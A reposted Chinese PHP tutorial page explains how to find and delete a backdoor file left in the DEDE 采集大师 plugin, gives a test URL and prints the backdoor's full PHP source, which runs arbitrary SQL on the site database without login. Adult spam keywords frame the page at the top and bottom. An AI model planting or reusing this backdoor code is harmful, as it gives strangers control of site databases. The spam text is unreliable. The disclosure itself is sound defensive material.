天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

DEDE采集大師官方留后門的刪除辦法

2014-10-22 10:07:31 分類:php技術 閱讀()
去除官方后門方法:安裝好采集大師后,請立即刪除 include目錄下的dedesql.query.php文件,如已經安裝過,有可能文件已被改名為arc.sqlquery.class.php,找到并刪除即可。此文件可被利用來在無需登錄驗證的情況下查詢網站數據庫,并進行更新、刪除、查詢數據等操作。大家也可以自己測試一下是否如我所說,方法:
http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo
輸入以上網址,即可打開后門界面。
說實話,會故意留后門的程序,最好的方法就是別用。這個后門被發現了,天知道下一個所謂的新版本還會不會冒出更多的后門來。此后門文件代碼如下:
復制代碼 代碼如下:
<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");
if(emptyempty($dopost))
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename('dedesql.query.php','arc.sqlquery.class.php')){
echo "成功!";
}else{
echo "失敗!";
}
exit();
}
if($dopost=="viewinfo")
{
if(emptyempty($tablename))
{
echo "沒有指定表名!";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute('me');
$row2 = $dsql->GetArray('me',MYSQL_BOTH);
$ctinfo = $row2[1];
echo "<xmp>".trim($ctinfo)."</xmp>";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC.'/arc.partview.class.php');
$envs = $_sys_globals = array();
$envs['aid'] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');
$templet = str_replace("{style}",$cfg_df_style,$row['templet']);
$homeFile = dirname(__FILE__).'/'.$row['position'];
$homeFile = str_replace("http://","/",str_replace("http://","/",$homeFile));
$fp = fopen($homeFile,'w') or die("無法更新網站主頁到:$homeFile 位置");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo "成功更新首頁!";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))
{
echo "<span style='font-size:10pt'>刪除'數據表'或'數據庫'的語句不允許在這里執行。</span>";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "運行SQL:{$sqlquery},無返回記錄!";
}
else
{
echo "運行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."條記錄,最大返回100條!";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100)
{
break;
}
echo "<hr size=1 width='100%'/>";
echo "記錄:$j";
echo "<hr size=1 width='100%'/>";
foreach($row as $k=>$v)
{
echo "<font color='red'>{$k}:</font>{$v}<br/>/r/n";
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace("/r","",$sqlquery);
$sqls = split(";[ /t]{0,}/n",$sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "執行: <font color='blue'>$q</font> 出錯,錯誤提示:<font color='red'>".$errCode."</font><br>";
}
}
echo "成功執行{$i}個SQL語句!<br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo "成功執行1個SQL語句!<br><br>";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo '<html>
<head>
<meta http-equiv=/'Content-Type/' content=/'text/html; charset=gb2312/'>
<title>SQL命令行工具</title>
<link href=/'img/base.css/' rel=/'stylesheet/' type=/'text/css/'>
</head>
<body background=/'img/allbg.gif/' leftmargin=/'8/' topmargin=/'8/'>
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">
<tr>
<td height="19" background="img/tbg.gif">
<table width="96%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="24%"><strong>SQL命令運行器:</strong></td>
<td width="76%" align="right"> <b><a href="sys_data.php"><u>數據備份</u></a></b>
| <b><a href="sys_data_revert.php"><strong><u>數據還原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="200" bgcolor="#FFFFFF" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="2">
<form action="" method="post" name="infoform" target="stafrm">
<input type=/'hidden/' name=/'dopost/' value=/'viewinfo/' />
<tr bgcolor="#F3FBEC">
<td width="15%" height="24" align="center">系統的表信息:</td>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35%">
<select name="tablename" id="tablename" style="width:100%" size="6">
';
$dsql->SetQuery("Show Tables");
$dsql->Execute('t');
while($row = $dsql->GetArray('t',MYSQL_BOTH))
{
$dsql->SetQuery("Select count(*) From ".$row[0]);
$dsql->Execute('n');
$row2 = $dsql->GetArray('n',MYSQL_BOTH);
$dd = $row2[0];
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>/r/n";
}
;echo ' </select>
</td>
<td width="2%"> </td>
<td width="63%" valign="bottom">
<div style="float:left;margin-right:20px;">
<input type="Submit" name="Submit1" value="優化選中表" class="coolbg np" onClick="this.form.dopost.value=/'opimize/';" />
<br />
<input type="Submit" name="Submit2" value="修復選中表" class="coolbg np" onClick="this.form.dopost.value=/'repair/';" style="margin-top:6px;" />
<br />
<input type="Submit" name="Submit3" value="查看表結構" class="coolbg np" onClick="this.form.dopost.value=/'viewinfo/';" style="margin-top:6px;" />
</div>
<div style="float:left">
<input type="Submit" name="Submit5" value="優化全部表" class="coolbg np" onClick="this.form.dopost.value=/'opimizeAll/';" />
<br />
<input type="Submit" name="Submit6" value="修復全部表" class="coolbg np" onClick="this.form.dopost.value=/'repairAll/';" style="margin-top:6px;" />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center">返回信息:</td>
<td>
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>
</td>
</tr>
</form>
<form action="" method="post" name="form1" target="stafrm">
<input type=/'hidden/' name=/'dopost/' value=/'query/'>
<tr>
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>運行SQL命令行:
<input name="querytype" type="radio" class="np" value="0">
單行命令(支持簡單查詢)
<input name="querytype" type="radio" class="np" value="2" checked>
多行命令</strong></td>
</tr>
<tr>
<td height="118" colspan="2">
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea>
</td>
</tr>
<tr>
<td height="53" align="center"> </td>
<td>
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=/'np/' />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
';}
?>

php技術DEDE采集大師官方留后門的刪除辦法,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

標簽:
主站蜘蛛池模板: 国产综合在线观看 | 日韩精品久久久久影院 | 精品一区二区三区免费毛片 | 红尘影院在线观看 | 亚洲AV无码乱码国产麻豆P | 4虎影院午夜在线观看 | 2018久久视频在线视频观看 | 年轻的母亲4线在线观看完整 | 久久vs国产综合色 | 特大黑人娇小亚洲女mp4 | 无限资源日本2019版免费 | 51国产偷自视频在线视频播放 | 亚欧日韩毛片在线看免费网站 | 泰国淫乐园实录 | 日本内射精品一区二区视频 | 校园男男高h小黄文 | 免费毛片观看 | 午夜福利试看120秒体验区 | 免费在线观看一区 | 亚洲香蕉网久久综合影院 | 亚洲精品国产精麻豆久久99 | 久久笫一福利免费导航 | 黄色三级网站在线观看 | 999人在线精品播放视频 | 99久久精品免费国产一区二区三区 | 文中字幕一区二区三区视频播放 | 国产WW久久久久久久久久 | 韩国伦理电影在线神马网 | 5G年龄确认我已满18免费 | 被肉日常np快穿高h 被肉日常np高h | 京香在线观看 | 777米奇色狠狠俺去啦 | 麻豆久久婷婷五月国产 | 石原莉奈rbd806中文字幕 | 久久精品国产亚洲AV影院 | 色悠久久久久综合欧美99 | 韩国女人高潮嗷嗷叫视频 | 7723日本高清完整版在线观看 | 国产精品96久久久久久AV网址 | 吉吉影音先锋av资源 | 97超级碰碰人妻中文字幕 |